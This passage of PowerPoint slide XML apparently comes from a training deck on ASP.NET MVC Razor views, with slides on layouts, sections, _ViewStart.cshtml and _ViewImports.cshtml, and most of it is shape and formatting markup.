            <a:ext cx="641512" cy="929206"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="129038">
              <a:lumMod val="75000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="ctr" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId7"/>
              </a:buBlip>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28501863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Demo: Importance of HTML Encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37222933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Demo: Model Binding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42242833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Razor Pages &amp; MVC Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 2: Razor View Engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson: Layouts and Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41845849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Layouts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Layouts are to views what Master Pages are to web pages in ASP.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Layout defines a common template for ASP.NET MVC site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@RenderBody( ) defines placeholder for view body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2278311" y="2640660"/>
            <a:ext cx="3838576" cy="626340"/>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rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="22847"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3353777" y="3357346"/>
            <a:ext cx="7489843" cy="2741702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1904910" y="4612373"/>
            <a:ext cx="1448868" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_Layout.cshtml</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601442" y="2799156"/>
            <a:ext cx="1905234" cy="309347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_ViewStart.cshtml</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Bent-Up Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2655038" y="3343244"/>
            <a:ext cx="567050" cy="662362"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="129038">
              <a:lumMod val="75000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="ctr" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6248028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Layouts – Default ASP.NET MVC Template</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6612C17-2621-4097-ADC2-79EAECDE8936}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804508" y="1073456"/>
            <a:ext cx="8278184" cy="5200040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20429693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Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Layout may have multiple sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View must provide content for all layout sections, unless explicitly made optional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@RenderSection( … ) defines placeholder for layout sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6477000"/>
            <a:ext cx="4876800" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="2695575"/>
            <a:ext cx="7286625" cy="28670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243524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ViewStart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_ViewStart.cshtml is used to include the same layout in all views by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default layout can be overridden for specific views</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blank layout property means no layout has been defined</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2899245" y="2819400"/>
            <a:ext cx="6210630" cy="1219202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="4419602"/>
            <a:ext cx="3535680" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_ViewStart.cshtml</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11093503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Imports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_ViewImports.cshtml is used to import all the namespaces used by Views</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Views can add specific views in respective files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tag Helper global scope is set here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3957427" y="5294747"/>
            <a:ext cx="3535680" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_ViewImports.cshtml</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1728978" y="2971800"/>
            <a:ext cx="8420100" cy="1866900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22240688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Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A view can define only the sections that are referred to in the layout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr 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120" y="3619499"/>
            <a:ext cx="3940762" cy="1865093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="279400" dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:alpha val="72000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>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7948" y="1856679"/>
            <a:ext cx="3477615" cy="2374583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="393700" dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Bent-Up Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3919223" y="2798955"/>
            <a:ext cx="2191814" cy="820543"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="129038">
              <a:lumMod val="75000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="ctr" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>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5CEB6E02-1ADC-4AD4-8547-A64481A3BA04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="5634333"/>
            <a:ext cx="3535680" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>layout.cshtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C07E9F73-3548-432F-912F-0DEFC3A04C7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6288915" y="4472657"/>
            <a:ext cx="3535680" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buSzPct val="110000"/>
